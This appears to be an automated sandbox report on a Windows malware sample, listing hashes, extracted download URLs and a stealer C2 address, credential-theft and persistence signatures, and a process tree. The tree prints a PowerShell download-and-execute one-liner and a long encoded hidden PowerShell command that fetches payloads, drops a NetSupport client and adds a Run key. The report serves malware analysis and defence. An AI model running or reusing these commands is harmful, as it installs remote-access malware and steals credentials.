Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
11/09/2024, 16:25
Behavioral task
behavioral1
Sample
b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral2
Sample
b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
Resource
win11-20240802-en
General
-
Target
b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
-
Size
6.8MB
-
MD5
acb755d083c876f6a80105c17cc61754
-
SHA1
8ccfc2b30402e76a59ed07873b0ccf589728fd22
-
SHA256
b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86
-
SHA512
2d26da0b24c61e05a66583b548672f00b4351c87669fb8b7e4e71a73da4a2c0e470d7c6aa8072976fe8ca2ac5ea6b75e41f54b426c0d1de06aa118a83283b70b
-
SSDEEP
196608:DzSpVt4hhiIbZg4T4hac7p6eDcGRY9Dc+/7/MS6a:DWp74hVbehacQeHwDc+/7zb
Malware Config
Extracted
https://www.et-ba.com.tr/temp/b64_akam_kent_2708.ps1
Extracted
https://calbyiris.com/fvz/f2v.zip
https://calbyiris.com/fvz/f1v.zip
https://calbyiris.com/fvz/f3v.zip
https://calbyiris.com/fvz/f4v.zip
https://calbyiris.com/fvf/
Extracted
stealc
Workbaza
http://5.35.36.211
-
url_path
/cadb6378d4b16104.php
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2420 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 4668 client32.exe -
Loads dropped DLL 13 IoCs
pid Process 2040 b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe 2040 b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe 2040 b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe 2040 b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe 2040 b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe 2040 b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe 2040 b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe 2040 b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe 4668 client32.exe 4668 client32.exe 4668 client32.exe 4668 client32.exe 4668 client32.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\HDiskDefragm = "C:\\Users\\Admin\\AppData\\Roaming\\HDiskDefragm\\client32.exe" powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
pid Process 2420 powershell.exe 1604 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language client32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2040 b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe 2040 b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe 2040 b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe 2040 b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe 2420 powershell.exe 2420 powershell.exe 1604 powershell.exe 1604 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2420 powershell.exe Token: SeDebugPrivilege 1604 powershell.exe Token: SeSecurityPrivilege 4668 client32.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4668 client32.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 5112 wrote to memory of 2040 5112 b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe 79 PID 5112 wrote to memory of 2040 5112 b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe 79 PID 5112 wrote to memory of 2040 5112 b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe 79 PID 2040 wrote to memory of 2420 2040 b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe 80 PID 2040 wrote to memory of 2420 2040 b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe 80 PID 2040 wrote to memory of 2420 2040 b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe 80 PID 2420 wrote to memory of 1604 2420 powershell.exe 82 PID 2420 wrote to memory of 1604 2420 powershell.exe 82 PID 2420 wrote to memory of 1604 2420 powershell.exe 82 PID 1604 wrote to memory of 4668 1604 powershell.exe 84 PID 1604 wrote to memory of 4668 1604 powershell.exe 84 PID 1604 wrote to memory of 4668 1604 powershell.exe 84
Processes
-
C:\Users\Admin\AppData\Local\Temp\b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe"C:\Users\Admin\AppData\Local\Temp\b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5112 -
C:\Users\Admin\AppData\Local\Temp\b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe"C:\Users\Admin\AppData\Local\Temp\b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe"2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -nop -c "iex(New-Object Net.WebClient).DownloadString('https://www.et-ba.com.tr/temp/b64_akam_kent_2708.ps1')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nOPRofIlE -exEcUTiONpOlI bypASS -WinDOWST HiD -ec JAA3AGMAcQBNAFEAYgA9ACcAaAB0AHQAcABzADoALwAvAGMAYQBsAGIAeQBpAHIAaQBzAC4AYwBvAG0ALwBmAHYAegAvAGYAMgB2AC4AegBpAHAAJwA7ACAAJABZAEcAUwBKAHkAPQAnADgATABmAHoAdQAuAHoAaQBwACcAOwAgAGMASABkAGkAcgAgACQAZQBuAFYAOgBhAFAAUABEAGEAdABhADsAIAAkAGEAUwBPAGkAQwBOAEcAPQAnAEgARABpAHMAawBEAGUAZgByAGEAZwBtACcAOwAgACQATwBjAHQAVABKAE4ATAA9ACcATAAxAFAANQBrAEcALgB6AGkAcAAnADsAIAAkAGkAcwBVAGwAYQA9ACcAaAB0AHQAcABzADoALwAvAGMAYQBsAGIAeQBpAHIAaQBzAC4AYwBvAG0ALwBmAHYAegAvAGYAMQB2AC4AegBpAHAAJwA7ACAAWwBOAEUAVAAuAHMARQByAHYAaQBjAGUAUABPAEkAbgB0AE0AYQBOAGEAZwBFAFIAXQA6ADoAUwBlAEMAdQByAEkAVABZAHAAUgBvAHQAbwBjAG8ATAAgAD0AIABbAE4ARQB0AC4AcwBFAEMAVQBSAGkAVAB5AHAAcgBPAHQAbwBjAE8AbABUAHkAUABlAF0AOgA6AHQATABTADEAMgA7ACAAJABVAHIAMgA0AGwAWABYAD0AZwBjAE0AIABTAFQAYQBSAHQALQBiAGkAdABzAHQAUgBBAE4AcwBGAGUAUgAgAC0ARQBSAFIAbwBSAGEAYwBUAEkAbwBOACAAUwBJAGwARQBOAFQATAB5AGMATwBOAFQAaQBOAFUAZQA7ACAAJABwADcAbQA3AHIAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbABiAHkAaQByAGkAcwAuAGMAbwBtAC8AZgB2AHoALwBmADMAdgAuAHoAaQBwACcAOwAgACQARQBqAHQAYQBPAD0AZwBjAE0AIABFAHgAcABhAG4ARAAtAEEAUgBDAEgASQB2AEUAIAAtAEUAcgBSAG8AcgBBAEMAVABJAG8AbgAgAFMASQBMAEUAbgBUAEwAeQBjAE8AbgBUAGkAbgB1AGUAOwAgACQASgA0ADUASwBwAFIAdwByAD0AJwBoAHQAdABwAHMAOgAvAC8AYwBhAGwAYgB5AGkAcgBpAHMALgBjAG8AbQAvAGYAdgB6AC8AZgA0AHYALgB6AGkAcAAnADsAIAAkAGYAdQBSAFQANABHAFEAWgA9ACcAQwBlAG4AdwBnAC4AegBpAHAAJwA7ACAAJAB6AG4AOABpAEIAVQBHAD0AJwA5ADkANABVAHgALgB6AGkAcAAnADsAIAAkAGgARAB0AGEATQAyAFYAPQAiAHsAMAB9AFwAewAxAH0AIgAgAC0AZgAgACQARQBOAFYAOgBBAFAAcABEAGEAVABhACwAIAAkAGYAdQBSAFQANABHAFEAWgA7ACAAJABIAHMAaQBpAFIASwBWAD0ASgBvAGkAbgAtAHAAQQB0AGgAIAAtAHAAQQBUAGgAIAAkAEUATgBWADoAQQBQAHAARABhAFQAYQAgAC0AYwBIAGkATABkAFAAQQB0AGgAIAAkAFkARwBTAEoAeQA7ACAAJAA5ADcARABCADgAYwA9ACQARQBuAFYAOgBBAFAAUABEAGEAdABhACwAIAAkAE8AYwB0AFQASgBOAEwAIAAtAEoATwBJAE4AIAAnAFwAJwA7ACAAJAB6ADUAVgBkAFgAPQAkAGUATgBWADoAQQBQAFAAZABBAHQAYQArACcAXAAnACsAJAB6AG4AOABpAEIAVQBHADsAIAAkAEUAVQAzAGoAYwA9ACcAQgBpAFQAcwBhAEQATQBpAE4ALgBlAFgAZQAgAC8AdABSAEEAbgBzAGYARQByACAAUwBEAE4AWgBnADUAIAAvAGQAbwB3AE4AbABPAEEARAAgAC8AUABSAGkAbwByAEkAVAB5ACAAbgBPAFIAbQBBAGwAJwAsACAAJABpAHMAVQBsAGEALAAgACQAaABEAHQAYQBNADIAVgAgAC0AagBvAEkATgAgACcAIAAnADsAIAAkAFIAdAAzAFUATQBSADQAPQAnAEIAaQBUAHMAYQBEAE0AaQBOAC4AZQBYAGUAIAAvAHQAUgBBAG4AcwBmAEUAcgAgAFMARABOAFoAZwA1ACAALwBkAG8AdwBOAGwATwBBAEQAIAAvAFAAUgBpAG8AcgBJAFQAeQAgAG4ATwBSAG0AQQBsACAAJwArACQASgA0ADUASwBwAFIAdwByACsAJwAgACcAKwAkAEgAcwBpAGkAUgBLAFYAOwAgACQAQwBVAEMAawBoAD0AIgBCAGkAdABTAGEARABtAEkATgAuAGUAWABFACAALwB0AFIAQQBOAFMAZgBlAFIAIABGAEsATQB0AFQARQAgAC8AZABvAHcAbgBMAE8AQQBEACAALwBwAFIASQBvAFIAaQBUAHkAIABOAE8AcgBNAGEATAAgAHsAMAB9ACAAewAxAH0AIgAgAC0AZgAgACQANwBjAHEATQBRAGIALAAgACQAOQA3AEQAQgA4AGMAOwAgACQAdAA3AGcAZQBZAEIAbQA9ACIAJABFAG4AdgA6AGEAUABwAEQAYQBUAEEAXAAkAGEAUwBPAGkAQwBOAEcAIgA7ACAAJABxAEMANwBHAEMAPQAnAEIAaQBUAHMAYQBEAG0AaQBOAC4AZQB4AGUAIAAvAHQAUgBBAG4AUwBGAGUAcgAgAGsAbwA5AGwAQgAgAC8AZABvAHcAbgBMAE8AQQBkACAALwBwAFIASQBPAFIASQBUAFkAIABOAG8AUgBNAGEAbAAnACwAIAAkAHAANwBtADcAcgAsACAAJAB6ADUAVgBkAFgAIAAtAEoATwBpAG4AIAAnACAAJwA7ACAAaQBGACAAKAAkAEUAagB0AGEATwApACAAewAgAGkARgAgACgAJABVAHIAMgA0AGwAWABYACkAIAB7ACAAcwB0AGEAUgBUAC0AQgBJAHQAUwBUAFIAYQBOAHMARgBFAFIAIAAtAHMATwBVAFIAQwBFACAAJABwADcAbQA3AHIAIAAtAEQARQBzAHQAaQBOAGEAdABJAE8AbgAgACQAegA1AFYAZABYADsAIABzAHQAQQBSAHQALQBiAEkAdABTAFQAcgBBAE4AcwBGAEUAcgAgAC0AcwBPAFUAUgBDAEUAIAAkAEoANAA1AEsAcABSAHcAcgAgAC0AZABFAHMAdABJAG4AYQBUAGkATwBuACAAJABIAHMAaQBpAFIASwBWADsAIABzAFQAYQBSAFQALQBiAEkAVABTAHQAcgBBAE4AUwBGAEUAUgAgAC0AUwBvAFUAcgBjAGUAIAAkADcAYwBxAE0AUQBiACAALQBkAEUAcwBUAEkAbgBBAFQASQBvAE4AIAAkADkANwBEAEIAOABjADsAIABTAFQAYQBSAFQALQBiAEkAVABzAFQAcgBBAG4AcwBmAEUAUgAgAC0AUwBPAHUAcgBDAEUAIAAkAGkAcwBVAGwAYQAgAC0ARABFAHMAdABJAG4AYQB0AGkAbwBuACAAJABoAEQAdABhAE0AMgBWADsAIAB9ACAAZQBMAHMAZQAgAHsAaQBOAHYATwBrAEUALQBlAHgAUAByAEUAUwBzAGkATwBuACAALQBDAG8ATQBtAGEAbgBEACAAJABSAHQAMwBVAE0AUgA0ADsAIABpAE4AdgBPAGsARQAtAGUAeABQAHIARQBTAHMAaQBPAG4AIAAtAEMAbwBNAG0AYQBuAEQAIAAkAEMAVQBDAGsAaAA7ACAAaQBlAHgAIAAtAGMAbwBtAG0AYQBuAGQAIAAkAHEAQwA3AEcAQwA7ACAAaQBlAHgAIAAtAGMAbwBtAG0AYQBuAGQAIAAkAEUAVQAzAGoAYwA7ACAAfQAgAEUAeABQAEEATgBkAC0AYQBSAEMASABpAFYARQAgAC0AUABhAFQAaAAgACQASABzAGkAaQBSAEsAVgAgAC0ARABFAFMAdABpAG4AYQBUAGkATwBOAHAAYQB0AEgAIAAkAHQANwBnAGUAWQBCAG0AOwAgAGUAeABwAGEATgBkAC0AQQBSAGMASABJAHYAZQAgAC0AUABhAFQASAAgACQAOQA3AEQAQgA4AGMAIAAtAEQARQBTAFQAaQBuAEEAVABpAG8AbgBwAGEAdABIACAAJAB0ADcAZwBlAFkAQgBtADsAIABFAFgAcABhAE4AZAAtAEEAUgBjAGgAaQB2AGUAIAAtAHAAYQBUAEgAIAAkAHoANQBWAGQAWAAgAC0AZABlAHMAdABJAG4AYQB0AEkAbwBOAHAAYQB0AGgAIAAkAHQANwBnAGUAWQBCAG0AOwAgAGUAWABQAEEATgBEAC0AYQBSAGMAaABJAHYAZQAgAC0AUABBAHQAaAAgACQAaABEAHQAYQBNADIAVgAgAC0AZABlAFMAVABpAG4AQQB0AGkAbwBOAFAAYQBUAEgAIAAkAHQANwBnAGUAWQBCAG0AOwAgAHIARQBtAG8AVgBlAC0AaQB0AGUATQAgAC0AUABBAFQASAAgACQAegA1AFYAZABYADsAIABEAGUAbAAgAC0AcABhAFQAaAAgACQASABzAGkAaQBSAEsAVgA7ACAAcgBEACAALQBQAGEAVABIACAAJABoAEQAdABhAE0AMgBWADsAIABFAHIAQQBTAEUAIAAtAFAAYQB0AGgAIAAkADkANwBEAEIAOABjADsAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAFkAcwBtAFEASgA5AD0AJwBoAHQAdABwAHMAOgAvAC8AYwBhAGwAYgB5AGkAcgBpAHMALgBjAG8AbQAvAGYAdgBmAC8AJwA7ACAATgBpACAALQBQAGEAVABIACAAJABFAE4AVgA6AGEAcABwAEQAQQB0AEEAIAAtAE4AQQBtAGUAIAAkAGEAUwBPAGkAQwBOAEcAIAAtAEkAdABlAE0AVABZAHAARQAgACcAZABpAHIAZQBjAHQAbwByAHkAJwA7ACAAJAA0AG8ARwAzAFIATgA9AEAAKAAnAEEAdQBkAGkAbwBDAGEAcAB0AHUAcgBlAC4AZABsAGwAJwAsACAAJwBUAEMAQwBUAEwAMwAyAC4ARABMAEwAJwAsACAAJwBwAGMAaQBjAGEAcABpAC4AZABsAGwAJwAsACAAJwBQAEMASQBDAEwAMwAyAC4ARABMAEwAJwAsACAAJwByAGUAbQBjAG0AZABzAHQAdQBiAC4AZQB4AGUAJwAsACAAJwBOAFMATQAuAEwASQBDACcALAAgACcAUABDAEkAQwBIAEUASwAuAEQATABMACcALAAgACcAbgBzAG0AXwB2AHAAcgBvAC4AaQBuAGkAJwAsACAAJwBtAHMAdgBjAHIAMQAwADAALgBkAGwAbAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGkAbgBpACcALAAgACcASABUAEMAVABMADMAMgAuAEQATABMACcALAAgACcAbgBzAGsAYgBmAGwAdAByAC4AaQBuAGYAJwAsACAAJwBjAGwAaQBlAG4AdAAzADIALgBlAHgAZQAnACkAOwAgAGkARgAgACgAJABVAHIAMgA0AGwAWABYACkAIAB7ACAAJAA0AG8ARwAzAFIATgAgAHwAIABGAE8AUgBlAEEAYwBIACAAewAgACQAZwBGAFQANABDAGQARAA9ACQAWQBzAG0AUQBKADkAKwAkAF8AOwAgACQAcQBtAEUAcwBxAD0AIgB7ADAAfQBcAHsAMQB9ACIAIAAtAGYAIAAkAHQANwBnAGUAWQBCAG0ALAAgACQAXwA7ACAAcwBUAEEAUgB0AC0AQgBJAFQAUwB0AFIAYQBuAFMARgBFAFIAIAAtAFMATwB1AFIAQwBlACAAJABnAEYAVAA0AEMAZABEACAALQBEAGUAUwBUAEkAbgBBAFQAaQBvAE4AIAAkAHEAbQBFAHMAcQA7ACAAfQA7AH0AIABFAEwAUwBFACAAewAgACQANABvAEcAMwBSAE4AIAB8ACAAJQAgAHsAIAAkAGcARgBUADQAQwBkAEQAPQAkAFkAcwBtAFEASgA5ACsAJABfADsAIAAkAHEAbQBFAHMAcQA9ACIAJAB0ADcAZwBlAFkAQgBtAFwAJABfACIAOwAgACQAWQBuAFMASwBZAD0AJwBCAGkAdABzAEEAZABtAGkAbgAuAGUAWABFACAALwBUAHIAQQBOAFMAZgBlAFIAIABzAGwAeQBFAEUARABRAFMAIAAvAGQAbwB3AG4ATABPAGEAZAAgAC8AUAByAGkATwBSAGkAVABZACAATgBvAFIATQBhAGwAIAAnACsAJABnAEYAVAA0AEMAZABEACsAJwAgACcAKwAkAHEAbQBFAHMAcQA7ACAAJgAgACQAWQBuAFMASwBZADsAfQA7ACAAfQA7ACAAfQA7ACAAJABXAHMAMABQAHUASAB4AHEAPQBnAEkAIAAkAHQANwBnAGUAWQBCAG0AIAAtAGYAbwBSAGMARQA7ACAAJABXAHMAMABQAHUASAB4AHEALgBBAHQAdAByAEkAYgB1AHQAZQBzAD0AJwBIAGkAZABkAGUAbgAnADsAIAAkAHEAVQBzAEUAeQA9ACIAJAB0ADcAZwBlAFkAQgBtAFwAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAIgA7ACAAQwBkACAAJAB0ADcAZwBlAFkAQgBtADsAIABuAGUAVwAtAGkAdABlAG0AcAByAG8AUABFAHIAdAB5ACAALQBQAEEAVABIACAAJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAnACAALQBOAEEAbQBlACAAJABhAFMATwBpAEMATgBHACAALQB2AGEATABVAEUAIAAkAHEAVQBzAEUAeQAgAC0AcABSAG8AcABFAHIAdAB5AFQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwAgAHMAdABBAFIAVAAtAFAAUgBvAEMARQBTAHMAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7AA==4⤵
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Users\Admin\AppData\Roaming\HDiskDefragm\client32.exe"C:\Users\Admin\AppData\Roaming\HDiskDefragm\client32.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4668
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
4Credentials In Files
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
2KB
MD54a86dfe2dff3994056e7f97854798f41
SHA12c618b26008e3dc6607eff7e3fe2dca42376588c
SHA256d667a9fc556be57850089669354c1cf86cab949d034808d202fb658561799010
SHA5123bb29aae3c8e6b478d561001d599891211608dd83c63b6937d7fb0bceb274fb7c29efb00b9999ad1d5f7625b9e3f1ae96ec87e07952a6a2b6bc324195833f382
-
Filesize
16KB
MD5d39fd39000d0f423e7f5b946e91ebd83
SHA15934b4a4a5a3a09e41fda263d683559b3e2488f4
SHA256932c56b74c4488b19f136178efd2c7aaaf864778e55fa4343ba9d8e9837cca4a
SHA512b0469ec2ad1fc09653b65efaf71a7ab21238f86982285f28549c9181ff4bff945d81c7f5269f8142836ffa51a2595c7f308e4cbf9fef59b4b14d3a00be7becdf
-
Filesize
74KB
MD5afa8fb684eded0d4ca6aa03aebea446f
SHA198bbb8543d4b3fbecebb952037adb0f9869a63a5
SHA25644de8d0dc9994bff357344c44f12e8bfff8150442f7ca313298b98e6c23a588e
SHA5126669eec07269002c881467d4f4af82e5510928ea32ce79a7b1f51a71ba9567e8d99605c5bc86f940a7b70231d70638aeb2f6c2397ef197bd4c28f5e9fad40312
-
Filesize
114KB
MD521e301d58c481660af1efdebc4ad63fe
SHA1ec10719afcbd6317355bbe0de04beb3d5c067651
SHA256003429b4e119dc08798aada64c13002b210507291afae8cace5eb0032754e78e
SHA512fe06fcb3f6f3f76b7de0ea92ea4fb286c6f8643cbe0f34a9df9b354434aabe3941a3bf2028f3a2e61183f4c39ee2f80ec5dfdcd9854416423142142508a71493
-
Filesize
69KB
MD52df573607b053e4d8ba0eba9be96541c
SHA1d41b40c468898c9a2e4d6be434c7eea57724b546
SHA256a591d3054c741496889e1a427516d8aab89bb94636b96467213fa6449df9eb26
SHA51221fb191b49092abf5bc0ab029fdff0a63b7b77ed4edbf13b0c74eb8d3e5a9ebd5ba8314c0f8293ad5c922c5ad0849a23d1fa05e1c6e3104c23aab85dcd095e56
-
Filesize
781KB
MD5d214306a963d6db9dbe73c65d9b7c23e
SHA1e42d3786f3ecf2cffee2ca2b7821973630431231
SHA2565dd6afe3439d4eb8673de441ed980825919110abc2b1360c7a02a3cc365fcca8
SHA51276601a39f1e84eaf3257a4989a45b6e2ee8492788239bb8f42729bfdbfbd3a50949295fd459ee4d9649fd16c3815740d7bf8152c4b707432a2a480ced711473c
-
Filesize
28KB
MD5bc20614744ebf4c2b8acd28d1fe54174
SHA1665c0acc404e13a69800fae94efd69a41bdda901
SHA2560c7ec6de19c246a23756b8550e6178ac2394b1093e96d0f43789124149486f57
SHA5120c473e7070c72d85ae098d208b8d128b50574abebba874dda2a7408aea2aabc6c4b9018801416670af91548c471b7dd5a709a7b17e3358b053c37433665d3f6b
-
Filesize
4.3MB
MD584741db3367d6998108d22e03eaf2a71
SHA16564ab918223d0074dfbf9bc5d062fd3a2003079
SHA2563e0c22d1451c3f3578850990f54916eb276bb45b951649d6478523566dfa8059
SHA5121a6aa94ec97df73b23b0d5079bafa92c13f9786f5c488046e95804f4701baeecb1beb9fd96824a6009355321adb7319ac643af40ff0c6b01733050dab2b648c0
-
Filesize
24KB
MD5e2642d30be324bd86d711ada36797b85
SHA1c474699a4853f0157708901213d3165530c45a69
SHA256bb87be114067ab856067dbe74ba421c21cb0f36ad1960af0f5d61bda2e753fa2
SHA512b2bb79f229d86e74d04bae5ef4813909afeaac530ce71f384c2ce1e1c690d792b413255c35e97b0ef9ff72c68d779dc044a03646d35777a40f1a427eafc14666
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
320KB
MD52d3b207c8a48148296156e5725426c7f
SHA1ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA51255c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c
-
Filesize
253B
MD512b8cc1d0a34012bbbbe86880333c567
SHA1e89659c412af82e31e6d14c34e47d7cc4c5ec9a5
SHA2569c48ab2790281fca8d75abc805e6091f1b8133898852e6c09657d66f3dd0c48f
SHA512eb44405dc70b40f15463c075f57b535b6e7c5132a34a99a62d663566ddc50b82f329c40880ab4a5425fe41077d5eec2c28baa500d3b27182ac5f104038ca00dc
-
Filesize
3.5MB
MD5d16ffa06a35601a73b73836bf905ed19
SHA1b8231d36f921e5b75b592ea3374f19216a5c411f
SHA25680cc439a0633add1dd964bb6bb40ccdcfec3ae28da39fd9416642ab0605d40ab
SHA512e79b8cfbdd4d86742420a334ab6e0d70bcd3393ab8b07ae6d49ec435aef2bcbd07681774ac7e66eca41c11aa086b398440f74f0b1b77087aa2c18b76c6f3a168
-
Filesize
33KB
MD5290c26b1579fd3e48d60181a2d22a287
SHA1e4c91a7f161783c68cf67250206047f23bd25a29
SHA256973836529b57815903444dd5d4b764e8730986b1bd87179552f249062ee26128
SHA512114a9f068b36a1edf5cce9269057f0cc17b22a10cd73cbed3ef42ae71324e41363e543a3af8be57b410c533b62bcf7f28650b464cce96e0e6c14819cdb90129a
-
Filesize
733B
MD50cdedc9a0a1ee8c9f7ca140e543f2f1c
SHA12540f9e3c63b6174a60324b137ffb5697c1a7df8
SHA2563e63adc8fd536f6045c8ffde42649350f13df7b7d2f7f988f4bfb0591bf9afb6
SHA512068deac28541fb62792f49a3e368ea9949e3dba93f6c23a942d28e0d9ae87e3bb25a878a9d777a2ec2dc4b918fc0a357f7ce7534c22c62128f2fe2a7c7a14ae2
-
Filesize
755KB
MD50e37fbfa79d349d672456923ec5fbbe3
SHA14e880fc7625ccf8d9ca799d5b94ce2b1e7597335
